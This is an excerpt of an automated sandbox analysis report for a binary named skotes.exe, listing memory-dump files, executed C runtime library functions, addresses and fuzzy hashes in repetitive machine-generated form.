Associated: 00000002.00000002.2225176441.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225279090.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225572927.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225657582.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225758100.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225783831.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225840476.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225840476.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225942676.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225988723.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226005704.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226022713.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226039783.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226056811.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226077921.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226094470.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226109889.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226125265.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226140557.0000000000699000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226154213.000000000069A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226170008.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226194580.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226211891.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226230667.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226252851.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226275489.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226294618.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226315018.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226331084.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226352626.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226368505.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226384464.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226400933.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226416513.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226434118.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226455642.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226478790.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226571879.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226593603.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226611832.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226611832.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226656798.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226675931.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226690703.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226706831.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226722414.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226740940.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226757505.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 3aa8a530b6d951df87780cc676ad299d8d8449b7a1b4f5d82b9175d8203a53b1
Instruction ID: 601e35367c1452bf4fb48eb5ea6fac57bb75b905bf46983718ed5679f12a39c4
Opcode Fuzzy Hash: 3aa8a530b6d951df87780cc676ad299d8d8449b7a1b4f5d82b9175d8203a53b1
Instruction Fuzzy Hash: BB211D75A00119AFDF01FFA5D8819BEB7B9EF08714F10046AFA01B7291DB389D019BA5

Function 004AF35F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 004AF3A3

Strings

`'M, xrefs: 004AF375
8"M, xrefs: 004AF44B

Memory Dump Source

Source File: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000002.00000002.2224670067.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2224996195.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225159080.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225176441.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225279090.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225572927.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225657582.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225758100.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225783831.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225840476.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225840476.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225942676.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225988723.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226005704.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226022713.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226039783.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226056811.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226077921.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226094470.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226109889.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226125265.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226140557.0000000000699000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226154213.000000000069A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226170008.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226194580.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226211891.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226230667.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226252851.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226275489.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226294618.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226315018.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226331084.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226352626.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226368505.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226384464.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226400933.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226416513.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226434118.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226455642.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226478790.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226571879.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226593603.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226611832.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226611832.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226656798.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226675931.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226690703.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226706831.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226722414.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226740940.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226757505.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: ___free_lconv_mon
String ID: 8"M$`'M
API String ID: 3903695350-1506308239
Opcode ID: c63734afcc5cc91cdd024c38d852d3a01d2dae919c3f2a9102792de211e2db8b
Instruction ID: b8dcbab755dbcc059bef28d85c36f09d39f7b03d99999b5d540f40501f1f4224
Opcode Fuzzy Hash: c63734afcc5cc91cdd024c38d852d3a01d2dae919c3f2a9102792de211e2db8b
Instruction Fuzzy Hash: F5318F31500201DFDB20AABAD945B5B73E6EF26316F10482FF485D7691DF78AC94CB19

Analysis Process: skotes.exePID: 1592, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	6.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	740
Total number of Limit Nodes:	89

Executed Functions

Function 004B1ABC Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__dosmaperr.LIBCMT ref: 004B1BD7
__dosmaperr.LIBCMT ref: 004B1BF6
__dosmaperr.LIBCMT ref: 004B1D9C

Strings

H, xrefs: 004B1D21

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: __dosmaperr
String ID: H
API String ID: 2332233096-2852464175
Opcode ID: 4bf58a6a0a07ae052df7f1cf99cb2191b0c4490650b54f70131954ac3993e934
Instruction ID: 33cfd5b89d320b91a3b1702932c84ebd1af2035f95325c254f2ad637c9304ef6
Opcode Fuzzy Hash: 4bf58a6a0a07ae052df7f1cf99cb2191b0c4490650b54f70131954ac3993e934
Instruction Fuzzy Hash: BDA10732A041489FCF19DF68CC61BEE3BB1AB07324F64415FE811AB3E1D6399912C769

Function 004A6FB4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 145COMMON

Download Yara Rule

APIs

__dosmaperr.LIBCMT ref: 004A70C5

Part of subcall function 004A732A: __dosmaperr.LIBCMT ref: 004A735F

Strings

nJ, xrefs: 004A6FCE

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: __dosmaperr
String ID: nJ
API String ID: 2332233096-2303097403
Opcode ID: 0edadafe63efc1a6ffbcf0a15fd7bf3c00b14e97fea9e4efd117c5976bd6a99b
Instruction ID: fc62a6e6719dee2b5ce3a1676dc736a473a1c61b84deb1628b9d760dacca83e1
Opcode Fuzzy Hash: 0edadafe63efc1a6ffbcf0a15fd7bf3c00b14e97fea9e4efd117c5976bd6a99b
Instruction Fuzzy Hash: 50418D71904204ABCB34EFB6DC459AFBBF9EF9A300B10442EF956D3311E6389940CB69

Function 004AAC53 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 004AAC8D

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 184957573b4b7b3f3f1e9e5c7ceceeef9690306138971ef7635b313fcf954ce8
Instruction ID: 1bac1f93658ba8b70d1b389c25b18d05afdedbdaecfb586f83c6a5f45049ffa7
Opcode Fuzzy Hash: 184957573b4b7b3f3f1e9e5c7ceceeef9690306138971ef7635b313fcf954ce8
Instruction Fuzzy Hash: AD111871A0420AAFCB05DF59E94199B7BF4EF49314F04406AF805AB351D730ED25DB69

Function 004AD82F Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

